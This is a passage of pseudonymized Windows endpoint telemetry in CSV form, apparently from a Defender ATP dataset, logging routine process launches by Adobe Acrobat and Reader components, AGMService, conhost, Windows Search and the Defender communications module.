00:46:10.833163100+00:00,1768,svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:01.787800400+00:00,2021-06-24 01:02:01.838859300+00:00,39694dce-b8e6-447a-8530-a01b1a0fc45a,computerpii_0a470890c60768167990033d701e7bd881398861,169726,False,10.7740.19041.1052,False,11540474045175387,,11540474045175388,2021-06-24 01:00:01.522644600+00:00,5772,2021-06-24 01:00:01.522644600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,5772,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0,1557200,2021-01-26 05:50:58+00:00,2021-01-25 13:55:56+00:00,2021-06-24 01:00:01.518362200+00:00,2021-01-25 13:55:56+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,5.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager,Adobe Systems Incorporated,Adobe Acrobat,21.1.20150.432529,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher
+131,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:01.764750700+00:00,8580,AcroRd32.exe,"""AcroRd32.exe"" /l /slMode",PortableExecutable,2021-05-28 05:58:48+00:00,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe,3150048,3c9b885b579ebadaae15e391ac8313af,cf40670e0eb0629a0d51f65325c692788d0a5503dea3f13db643b916701ab1da,d75dea803685620b22514689e32c2287206dcc63,02e5f23e179d8db9e102b687ad3b42c5,7fa3bdd3fe2bb536e44488a975d67d63b9ced77d9707ccbcefb17de8e0d562b7,f3523b94ac9922be2e2977c073b5be2992b784b2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:01.750033900+00:00,3764,reader_sl.exe,"""Reader_sl.exe"" ",False,2021-06-24 01:00:01.522644600+00:00,5772,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:01.788790800+00:00,2021-06-24 01:02:01.838983600+00:00,4cc65a63-dc0b-4e13-aaab-6db9291f7ce2,computerpii_0a470890c60768167990033d701e7bd881398861,169727,False,10.7740.19041.1052,False,11540474045175388,,11540474045175389,2021-06-24 01:00:01.750033900+00:00,3764,2021-06-24 01:00:01.750033900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe,3764,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader,24232,2021-04-21 00:08:06+00:00,2021-04-21 02:19:48+00:00,2021-06-24 01:00:01.750087200+00:00,2021-04-21 02:19:48+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,5.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat,21.1.20150.432529,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher,Adobe Systems Incorporated,Adobe Acrobat Reader DC,21.5.20048.436468,,AcroRd32.exe,Adobe Acrobat Reader DC
+132,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:01.777869600+00:00,8864,acrobat_sl.exe,"""Acrobat_sl.exe"" ",PortableExecutable,2021-02-02 05:49:32+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe,24232,d4ebed1bb1cfb00171ce0cf6dbc4039b,f6b88a34e92155a3b9c1cc3aca24c56d62318b3ffb343025318bfdb5367b4e3c,da66d66d18c23a33e78d356b3b5be963c3e32dc9,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:01.522644600+00:00,5772,AdobeARM.exe,"""AdobeARM.exe""",False,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:01.789486900+00:00,2021-06-24 01:02:01.839080500+00:00,545dab87-0cbc-43ec-b565-19d57f84495d,computerpii_0a470890c60768167990033d701e7bd881398861,169728,False,10.7740.19041.1052,False,11540474045175387,,11540474045175390,2021-06-24 01:00:01.522644600+00:00,5772,2021-06-24 01:00:01.522644600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,5772,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0,1557200,2021-01-26 05:50:58+00:00,2021-01-25 13:55:56+00:00,2021-06-24 01:00:01.518362200+00:00,2021-01-25 13:55:56+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,5.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager,Adobe Systems Incorporated,Adobe Acrobat,21.1.20135.421056,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher
+133,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:01.804308500+00:00,18236,Acrobat.exe,"""Acrobat.exe"" /l /slMode",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,d4ebed1bb1cfb00171ce0cf6dbc4039b,f6b88a34e92155a3b9c1cc3aca24c56d62318b3ffb343025318bfdb5367b4e3c,da66d66d18c23a33e78d356b3b5be963c3e32dc9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:01.777869600+00:00,8864,acrobat_sl.exe,"""Acrobat_sl.exe"" ",False,2021-06-24 01:00:01.522644600+00:00,5772,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:01.923881700+00:00,2021-06-24 01:02:01.839244700+00:00,99b46333-14bf-441a-8477-3ccd6688c50f,computerpii_0a470890c60768167990033d701e7bd881398861,169730,False,10.7740.19041.1052,False,11540474045175390,,11540474045175391,2021-06-24 01:00:01.777869600+00:00,8864,2021-06-24 01:00:01.777869600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe,8864,128,TerminateProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,24232,2021-02-02 03:38:39+00:00,2021-02-02 05:49:32+00:00,2021-06-24 01:00:01.772182600+00:00,2021-02-02 05:49:32+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,5.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat,21.1.20135.421056,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+134,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:01.912757300+00:00,10408,RdrCEF.exe,"""RdrCEF.exe"" --slMode",PortableExecutable,2021-05-28 05:58:50+00:00,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe,7229664,c3e3e510c1c2988a080c020d555e3f1f,bd6e90e120c7a195c5d65d8434bd04d8b77f4f91eca5897abec26afbe1093668,e47c6fbe16095f6cd1c04c2abb51e0cf82a01310,02e5f23e179d8db9e102b687ad3b42c5,7fa3bdd3fe2bb536e44488a975d67d63b9ced77d9707ccbcefb17de8e0d562b7,f3523b94ac9922be2e2977c073b5be2992b784b2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:01.750033900+00:00,3764,reader_sl.exe,"""Reader_sl.exe"" ",False,2021-06-24 01:00:01.522644600+00:00,5772,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:01.928600800+00:00,2021-06-24 01:02:01.839463200+00:00,c177b51e-0342-4cfa-a3b9-b304957ddd37,computerpii_0a470890c60768167990033d701e7bd881398861,169732,False,10.7740.19041.1052,False,11540474045175388,,11540474045175393,2021-06-24 01:00:01.750033900+00:00,3764,2021-06-24 01:00:01.750033900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe,3764,128,TerminateProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader,24232,2021-04-21 00:08:06+00:00,2021-04-21 02:19:48+00:00,2021-06-24 01:00:01.750087200+00:00,2021-04-21 02:19:48+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,5.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat,21.1.20150.432529,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher,,,,,,
+135,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:01.951976700+00:00,16296,AcroRd32.exe,"""AcroRd32.exe"" --type=renderer /prefetch:1  /l /slMode",PortableExecutable,2021-05-28 05:58:48+00:00,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe,3150048,3c9b885b579ebadaae15e391ac8313af,cf40670e0eb0629a0d51f65325c692788d0a5503dea3f13db643b916701ab1da,d75dea803685620b22514689e32c2287206dcc63,3c9b885b579ebadaae15e391ac8313af,cf40670e0eb0629a0d51f65325c692788d0a5503dea3f13db643b916701ab1da,d75dea803685620b22514689e32c2287206dcc63,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:01.764750700+00:00,8580,AcroRd32.exe,"""AcroRd32.exe"" /l /slMode",False,2021-06-24 01:00:01.750033900+00:00,3764,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:01.974134100+00:00,2021-06-24 01:02:01.839550900+00:00,5e8849f5-1daa-474e-97ac-e6886c331efc,computerpii_0a470890c60768167990033d701e7bd881398861,169733,False,10.7740.19041.1052,False,11540474045175389,,11540474045175394,2021-06-24 01:00:01.764750700+00:00,8580,2021-06-24 01:00:01.764750700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe,8580,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader,3150048,2021-05-28 05:27:26+00:00,2021-05-28 05:58:48+00:00,2021-06-24 01:00:01.765677200+00:00,2021-05-28 05:58:48+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat Reader DC,21.5.20048.436468,,AcroRd32.exe,Adobe Acrobat Reader DC ,Adobe Systems Incorporated,Adobe Acrobat Reader DC,21.5.20048.436468,,AcroRd32.exe,Adobe Acrobat Reader DC
+136,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:02.206692200+00:00,10588,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_yiyysw 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:02.243335600+00:00,2021-06-24 01:02:01.839708+00:00,eb12b92b-a7c7-4779-940a-15e52541facb,computerpii_0a470890c60768167990033d701e7bd881398861,169735,False,10.7740.19041.1052,False,11540474045136991,,11540474045175395,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+137,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:02.213897300+00:00,10172,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:00:02.206692200+00:00,10588,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_yiyysw 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:02.243875600+00:00,2021-06-24 01:02:01.839800100+00:00,29ddee4d-60d6-4496-9894-5b254b1ffb87,computerpii_0a470890c60768167990033d701e7bd881398861,169736,False,10.7740.19041.1052,False,11540474045175395,,11540474045175396,2021-06-24 01:00:02.206692200+00:00,10588,2021-06-24 01:00:02.206692200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,10588,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+138,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:00:02.687076900+00:00,19400,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe743_ Global\UsGthrCtrlFltPipeMssGthrPipe743 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:02.837533300+00:00,2021-06-24 01:02:01.840601300+00:00,6e8a50db-4e59-4a14-93bf-85067bde1bf4,computerpii_0a470890c60768167990033d701e7bd881398861,169746,False,10.7740.19041.1052,False,11540474045144190,,11540474045175397,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+139,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:00:02.814397900+00:00,9836,SenseCncProxy.exe,1152,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:02.840845400+00:00,2021-06-24 01:02:01.840746700+00:00,4db2853b-6eba-402c-9566-5f2ca05a4ede,computerpii_0a470890c60768167990033d701e7bd881398861,169748,False,10.7740.19041.1052,False,11540474045137006,,11540474045175399,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+140,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:00:03.220970100+00:00,3216,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_btsekw 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:00:03.242778300+00:00,2021-06-24 01:02:01.841588900+00:00,7b3c087e-f780-46c5-9687-7cf22a4d3418,computerpii_0a470890c60768167990033d701e7bd881398861,169757,False,10.7740.19041.1052,False,11540474045136991,,11540474045175402,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
